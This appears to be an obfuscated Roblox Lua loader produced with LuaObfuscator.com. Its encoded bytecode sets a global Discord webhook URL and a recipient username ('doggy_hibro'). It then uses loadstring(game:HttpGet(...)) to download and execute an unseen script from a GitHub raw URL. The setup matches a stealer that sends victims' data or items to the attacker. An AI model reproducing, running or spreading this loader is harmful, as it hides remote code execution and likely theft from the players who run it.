--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v87=0;local v88;while true do if (v87==1) then return v88;end if (v87==0) then v88=v5(v82,v19);v19=nil;v87=1;end end else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=(v31/(((2 + 3) -3)^(v32-(2 -1))))%((3 -1)^(((v33-1) -(v32-((1 + 1) -1))) + 1)) ;return v83-(v83%((1497 -(282 + 595)) -(555 + 64))) ;else local v84=2^(v32-(932 -(857 + 74))) ;return (((v31%(v84 + v84))>=v84) and (569 -(367 + 201))) or ((2564 -(1523 + 114)) -(214 + 713)) ;end end local function v21()local v34=0 + 0 ;local v35;while true do if (v34==(0 -(117 -(32 + 85)))) then v35=v1(v16,v18,v18);v18=v18 + (1066 -(68 + 997)) ;v34=1271 -(226 + 1044) ;end if (v34==(4 -3)) then return v35;end end end local function v22()local v36=0 + 0 ;local v37;local v38;while true do if (1==v36) then return (v38 * (57 + 199)) + v37 ;end if (v36==((1756 -799) -((1242 -(87 + 263)) + 65))) then v37,v38=v1(v16,v18,v18 + 2 );v18=v18 + (4 -2) ;v36=(181 -(67 + 113)) -0 ;end end end local function v23()local v39,v40,v41,v42=v1(v16,v18,v18 + 3 + 0 );v18=v18 + 3 + 1 ;return (v42 * 16777216) + (v41 * (160901 -95365)) + (v40 * (1208 -((2159 -1357) + 150))) + v39 ;end local function v24()local v43=v23();local v44=v23();local v45=1 -0 ;local v46=(v20(v44,1,20) * ((2 + 0)^(1029 -(915 + 82)))) + v43 ;local v47=v20(v44,59 -38 ,14 + 17 );local v48=((v20(v44,19 + 13 )==(1 -0)) and  -((2101 -913) -(1069 + 118))) or 1 ;if (v47==(0 -0)) then if (v46==(0 -(438 -(145 + 293)))) then return v48 * (0 + 0) ;else v47=1 -0 ;v45=0 + 0 ;end elseif (v47==(2838 -(368 + 423))) then return ((v46==(0 -0)) and (v48 * ((19 -(10 + 8))/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-1023 ) * (v45 + (v46/((444 -(416 + 26))^((595 -(44 + 386)) -113)))) ;end local function v25(v49)local v50=1486 -(998 + (1732 -1244)) ;local v51;local v52;while true do if (v50==(1 + (859 -(814 + 45)))) then v51=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;v50=(4 -2) + 0 + 0 ;end if (v50==(772 -(201 + 571))) then v51=nil;if  not v49 then v49=v23();if (v49==(1138 -(116 + 1022))) then return "";end end v50=1;end if (v50==(12 -(4 + 5))) then return v6(v52);end if (v50==2) then v52={};for v89=1 + (885 -(261 + 624)) , #v51 do v52[v89]=v2(v1(v3(v51,v89,v89)));end v50=10 -7 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0 + 0 ;local v54;local v55;local v56;local v57;local v58;local v59;while true do local v66=0 -0 ;local v67;while true do if (v66~=0) then else v67=574 -(507 + 67) ;while true do if (0~=v67) then else if (v53~=(2 -1)) then else local v97=166 -(122 + 44) ;while true do if (v97~=(1 -0)) then else v59={};v53=1751 -(1013 + 736) ;break;end if (v97==(0 + 0)) then v57={v54,v55,nil,v56};v58=v23();v97=1 -0 ;end end end if (v53==(0 -0)) then local v98=0;local v99;while true do if (v98~=0) then else v99=0;while true do if ((0 -0)==v99) then local v118=285 -(134 + 151) ;while true do if (v118~=(1666 -(970 + 695))) then else v99=1;break;end if (v118==(0 -0)) then v54={};v55={};v118=1991 -(582 + 1408) ;end end end if (v99~=(3 -2)) then else v56={};v53=1 -0 ;break;end end break;end end end v67=3 -2 ;end if (v67==1) then if (v53~=(1827 -(1195 + 629))) then else for v102=1,v23() do v55[v102-(1 -0) ]=v28();end return v57;end if (v53~=(5 -3)) then else local v100=241 -(187 + 54) ;local v101;while true do if ((780 -(162 + 618))==v100) then v101=0 + 0 ;while true do if ((0 + 0)==v101) then for v143=1 -0 ,v58 do local v144=0 -0 ;local v145;local v146;local v147;while true do if (v144~=(414 -(15 + 398))) then else v147=nil;while true do if ((982 -(18 + 964))~=v145) then else local v178=0 + 0 ;while true do if (v178~=1) then else v145=1637 -(1373 + 263) ;break;end if (v178~=(1000 -(451 + 549))) then else v146=v21();v147=nil;v178=1 + 0 ;end end end if (v145~=(1 -0)) then else if (v146==(1 -0)) then v147=v21()~=(0 + 0) ;elseif (v146==(1386 -(746 + 638))) then v147=v24();elseif (v146==3) then v147=v25();end v59[v143]=v147;break;end end break;end if ((0 + 0)==v144) then v145=0;v146=nil;v144=851 -(20 + 830) ;end end end v57[2 + 1 ]=v21();v101=1 -0 ;end if (v101==(127 -(116 + 10))) then for v148=342 -(218 + 123) ,v23() do local v149=1581 -(1535 + 46) ;local v150;local v151;while true do if (1~=v149) then else while true do if (v150~=(0 + 0)) then else v151=v21();if (v20(v151,1 + 0 ,1 + 0 )~=(560 -(306 + 254))) then else local v180=0 + 0 ;local v181;local v182;local v183;local v184;while true do if ((0 -0)~=v180) then else v181=0;v182=nil;v180=1 -0 ;end if (v180==2) then while true do if (v181==0) then local v186=1467 -(899 + 568) ;while true do if (v186~=(0 + 0)) then else v182=v20(v151,2,7 -4 );v183=v20(v151,607 -(268 + 335) ,411 -(118 + 287) );v186=3 -2 ;end if (v186~=1) then else v181=291 -(60 + 230) ;break;end end end if (v181==(575 -(426 + 146))) then if (v20(v183,8 -5 ,1 + 2 )~=(1457 -(282 + 1174))) then else v184[18 -14 ]=v59[v184[815 -(569 + 242) ]];end v54[v148]=v184;break;end if (v181~=2) then else local v188=0 -0 ;while true do if (v188==(0 + 0)) then local v193=977 -(553 + 424) ;while true do if (v193~=0) then else if (v20(v183,1,1 -0 )~=1) then else v184[1 + 1 ]=v59[v184[2 + 0 ]];end if (v20(v183,2,2 + 0 )==1) then v184[2 + 1 ]=v59[v184[3]];end v193=1025 -(706 + 318) ;end if (v193==(1 + 0)) then v188=1;break;end end end if (v188==(1252 -(721 + 530))) then v181=3;break;end end end if (v181==1) then local v189=1271 -(945 + 326) ;local v190;while true do if (v189==(0 -0)) then v190=0 -0 ;while true do if (v190~=1) then else v181=2;break;end if (v190~=0) then else local v194=0 + 0 ;while true do if (v194==(700 -(271 + 429))) then v184={v22(),v22(),nil,nil};if (v182==0) then local v199=0 + 0 ;local v200;local v201;while true do if (v199~=1) then else while true do if (v200==(0 -0)) then v201=1086 -(461 + 625) ;while true do if (v201==(1288 -(993 + 295))) then v184[1 + 2 ]=v22();v184[2 + 2 ]=v22();break;end end break;end end break;end if (v199==0) then v200=0;v201=nil;v199=1;end end elseif (v182==1) then v184[1332 -(797 + 532) ]=v23();elseif (v182==(1173 -(418 + 753))) then v184[2 + 1 ]=v23() -((1 + 1)^(37 -21)) ;elseif (v182==3) then local v204=1202 -(373 + 829) ;local v205;local v206;while true do if (v204==(0 + 0)) then local v209=0 + 0 ;while true do if (v209~=(732 -(476 + 255))) then else v204=1 + 0 ;break;end if (v209==(529 -(406 + 123))) then v205=1130 -(369 + 761) ;v206=nil;v209=1770 -(1749 + 20) ;end end end if (v204~=(1 + 0)) then else while true do if (v205~=0) then else v206=0 -0 ;while true do if (v206~=(1322 -(1249 + 73))) then else v184[241 -(64 + 174) ]=v23() -((1 + 1)^(1161 -(466 + 679))) ;v184[4]=v22();break;end end break;end end break;end end end v194=1;end if (v194~=(2 -1)) then else v190=2 -1 ;break;end end end end break;end end end end break;end if ((1901 -(106 + 1794))==v180) then v183=nil;v184=nil;v180=2 -0 ;end end end break;end end break;end if (v149~=(0 + 0)) then else local v174=0;local v175;while true do if (v174~=(216 -(42 + 174))) then else v175=0 + 0 ;while true do if (v175==(0 + 0)) then local v185=0 -0 ;while true do if (0~=v185) then else v150=0 + 0 ;v151=nil;v185=2 -1 ;end if (v185~=(115 -(4 + 110))) then else v175=585 -(57 + 527) ;break;end end end if (v175~=(1428 -(41 + 1386))) then else v149=104 -(17 + 86) ;break;end end break;end end end end end v53=3 + 0 ;break;end end break;end end end break;end end break;end end end end local function v29(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v85=0,v76 do if (v85>=v70) then v74[v85-v70 ]=v75[v85 + 1 ];else v78[v85]=v75[v85 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v86=0;while true do if (1==v86) then if (v81<=10) then if (v81<=4) then if (v81<=1) then if (v81>0) then v78[v80[2]]();else do return;end end elseif (v81<=2) then local v104=0;local v105;local v106;local v107;local v108;while true do if (v104==1) then v73=(v107 + v105) -1 ;v108=0;v104=2;end if (2==v104) then for v154=v105,v73 do v108=v108 + 1 ;v78[v154]=v106[v108];end break;end if (v104==0) then v105=v80[2];v106,v107=v71(v78[v105](v13(v78,v105 + 1 ,v80[3])));v104=1;end end elseif (v81>3) then v72=v80[3];else v78[v80[2]]=v80[3]~=0 ;end elseif (v81<=7) then if (v81<=5) then v78[v80[2]]=v62[v80[3]];elseif (v81>6) then local v122=0;local v123;while true do if (v122==0) then v123=v80[2];v78[v123]=v78[v123](v13(v78,v123 + 1 ,v73));break;end end else v78[v80[2]][v80[3]]=v80[4];end elseif (v81<=8) then do return;end elseif (v81==9) then v78[v80[2]][v80[3]]=v80[4];else v78[v80[2]]=v80[3];end elseif (v81<=15) then if (v81<=12) then if (v81==11) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end else v78[v80[2]]=v80[3]~=0 ;end elseif (v81<=13) then v78[v80[2]]();elseif (v81>14) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end else local v131=0;local v132;local v133;while true do if (v131==0) then v132=v80[2];v133=v78[v80[3]];v131=1;end if (v131==1) then v78[v132 + 1 ]=v133;v78[v132]=v133[v80[4]];break;end end end elseif (v81<=18) then if (v81<=16) then v72=v80[3];elseif (v81>17) then v78[v80[2]]=v80[3];else local v136=0;local v137;local v138;while true do if (v136==1) then v78[v137 + 1 ]=v138;v78[v137]=v138[v80[4]];break;end if (v136==0) then v137=v80[2];v138=v78[v80[3]];v136=1;end end end elseif (v81<=19) then local v113=0;local v114;local v115;local v116;local v117;while true do if (v113==0) then v114=v80[2];v115,v116=v71(v78[v114](v13(v78,v114 + 1 ,v80[3])));v113=1;end if (v113==1) then v73=(v116 + v114) -1 ;v117=0;v113=2;end if (v113==2) then for v158=v114,v73 do local v159=0;while true do if (v159==0) then v117=v117 + 1 ;v78[v158]=v115[v117];break;end end end break;end end elseif (v81==20) then local v139=0;local v140;while true do if (v139==0) then v140=v80[2];v78[v140]=v78[v140](v13(v78,v140 + 1 ,v73));break;end end else v78[v80[2]]=v62[v80[3]];end v72=v72 + 1 ;break;end if (0==v86) then v80=v68[v72];v81=v80[1];v86=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O31363330362O3035373130362O323832302F676E564D4C425F4451395F774B514F2D436342744E68337071634A544F30643166634F3353424757457050354B6C73423864742D59474652497A6837445F4D6B31585753030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D65030B3O00646F2O67795F686962726F03093O00557365724E616D653200173O00120A3O00013O00260F3O000E000100020004103O000E0001001205000100033O003006000100040005001205000100063O001205000200073O00200E00020002000800120A000400094O000C000500014O0013000200054O001400013O00022O000D0001000100010004103O0016000100260F3O0001000100010004103O00010001001205000100033O0030060001000A000B001205000100033O0030060001000C000B00120A3O00023O0004103O000100016O00017O00",v9(),...);end
